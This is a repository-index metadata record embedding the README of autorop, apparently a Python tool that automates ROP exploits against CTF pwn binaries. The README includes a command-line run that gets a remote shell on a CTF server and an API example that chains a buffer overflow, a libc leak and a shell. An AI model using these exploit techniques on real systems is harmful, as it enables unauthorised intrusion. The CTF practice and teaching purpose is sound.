{"id":13341165,"url":"https://github.com/mariuszskon/autorop","last_synced_at":"2025-03-11T20:32:34.427Z","repository":{"id":52597042,"uuid":"299023441","full_name":"mariuszskon/autorop","owner":"mariuszskon","description":"Automated solver of classic CTF pwn challenges, with flexibility in mind.","archived":false,"fork":false,"pushed_at":"2022-04-03T09:35:36.000Z","size":238,"stargazers_count":55,"open_issues_count":5,"forks_count":8,"subscribers_count":2,"default_branch":"master","last_synced_at":"2024-10-24T08:29:11.357Z","etag":null,"topics":["capture-the-flag","ctf","exploit","hacktoberfest","linux","pwnable","pwntools","rop","wargame"],"latest_commit_sha":null,"homepage":"https://autorop.readthedocs.io","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mariuszskon.png","metadata":{"files":{"readme":"README.rst","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2020-09-27T12:06:38.000Z","updated_at":"2024-10-20T08:36:14.000Z","dependencies_parsed_at":"2022-09-01T04:12:39.441Z","dependency_job_id":null,"html_url":"https://github.com/mariuszskon/autorop","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mariuszskon%2Fautorop","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mariuszskon%2Fautorop/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mariuszskon%2Fautorop/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mariuszskon%2Fautorop/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mariuszskon","download_url":
"https://codeload.github.com/mariuszskon/autorop/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243108665,"owners_count":20237728,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["capture-the-flag","ctf","exploit","hacktoberfest","linux","pwnable","pwntools","rop","wargame"],"created_at":"2024-07-29T19:25:13.539Z","updated_at":"2025-03-11T20:32:34.118Z","avatar_url":"https://github.com/mariuszskon.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"autorop\n=======\n\n|docs| |Test status| |MIT license|\n\nAutomated solver of classic CTF pwn challenges, with flexibility in mind.\n\nOfficial documentation can be found at `autorop.readthedocs.io \u003chttps://autorop.readthedocs.io\u003e`_.\n\nDisclaimer\n----------\n\nDo not use this software for illegal purposes. This software is intended to be used in legal Capture the Flag competitions only.\n\nCommand line\n------------\n\n.. code-block:: text\n\n    $ autorop\n    Usage: autorop BINARY [HOST PORT]\n\n.. 
code-block:: text\n\n    $ autorop tests/bamboofox/ret2libc bamboofox.cs.nctu.edu.tw 11002\n    [*] '/home/mariusz/Projects/autorop/tests/bamboofox/ret2libc'\n        Arch:     i386-32-little\n        RELRO:    Partial RELRO\n        Stack:    No canary found\n        NX:       NX enabled\n        PIE:      No PIE (0x8048000)\n    [*] Produced pipeline: Classic(Corefile(), OpenTarget(), Puts(False, ['__libc_start_main', 'puts']), Auto(), SystemBinSh())\n    [*] Pipeline [1/5]: Corefile()\n    [+] Starting local process 'tests/bamboofox/ret2libc': pid 18833\n    [*] Process 'tests/bamboofox/ret2libc' stopped with exit code -11 (SIGSEGV) (pid 18833)\n    ...\n    [*] Switching to interactive mode\n    Hello!\n    The address of \"/bin/sh\" is 0x804a02c\n    The address of function \"puts\" is 0xf7e43da0\n    $ wc -c /home/ctf/flag\n    57 /home/ctf/flag\n\n\nAPI\n---\n\nImporting autorop automatically does a ``from pwn import *``, so you can use all of `pwntools' goodies \u003chttps://docs.pwntools.com/en/latest/\u003e`_.\n\nCentral to autorop's design is the `pipeline \u003chttps://en.wikipedia.org/wiki/Pipeline_(software)\u003e`_. Most functions take in a ``PwnState``, and pass it on to the next function with some attributes changed. ``Pipeline`` copies\\* the ``PwnState`` between each function so mutations are safe. This allows great simplicity and flexibility.\n\nSee how the below example neatly manages to \"downgrade\" the problem from something unique, to something generic that the ``Classic`` pipeline can handle.\n\n.. 
code-block:: python\n\n    from autorop import *\n\n    BIN = \"./tests/tjctf_2020/stop\"\n\n\n    def send_letter_first(tube, data):\n        # the binary expects us to choose a letter first, before it takes input unsafely\n        tube.sendline(\"A\")\n        # send actual payload\n        tube.sendline(data)\n\n    # create a starting state\n    s = PwnState(BIN, lambda: process(BIN))\n    # set an overwriter function, if the buffer overflow input\n    # is not available immediately\n    s.overwriter = send_letter_first\n\n    # use base classic pipeline, with printf for leaking\n    pipeline = turnkey.Classic(leak=leak.Printf())\n    result = pipeline(s)\n\n    # switch to interactive shell which we got via the exploit\n    result.target.interactive()\n\n\\* **Note**: Although most of the attributes are deep-copied, ``target`` and ``_elf`` are not.\n\n.. |docs| image:: https://readthedocs.org/projects/autorop/badge/\n    :target: https://autorop.readthedocs.io\n\n.. |Test status| image:: https://github.com/mariuszskon/autorop/workflows/autorop%20test/badge.svg?branch=master\n    :target: https://github.com/mariuszskon/autorop/actions?query=workflow%3A%22autorop+test%22+branch%3Amaster\n\n.. |MIT license| image:: https://img.shields.io/badge/license-MIT-blue.svg\n    :target: https://github.com/mariuszskon/autorop/blob/master/LICENSE\n\nInstall\n-------\n\n1. Install autorop itself. You might want to be in your `python virtual environment \u003chttps://docs.python.org/3/tutorial/venv.html\u003e`_. After cloning, install with pip:\n\n.. code-block:: text\n\n    $ git clone https://github.com/mariuszskon/autorop \u0026\u0026 cd autorop \u0026\u0026 pip install .\n\n2. Make sure corefiles are enabled and are plainly written to the right directory:\n\n.. code-block:: text\n\n    # sysctl -w kernel.core_pattern=core.%p\n\n3. 
(Optional) Install `libc-database \u003chttps://github.com/niklasb/libc-database\u003e`_ into ``~/.libc-database`` (or a location of your choice, in which case edit ``state.libc_database_path``).\n\n4. All done!\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmariuszskon%2Fautorop","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmariuszskon%2Fautorop","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmariuszskon%2Fautorop/lists"}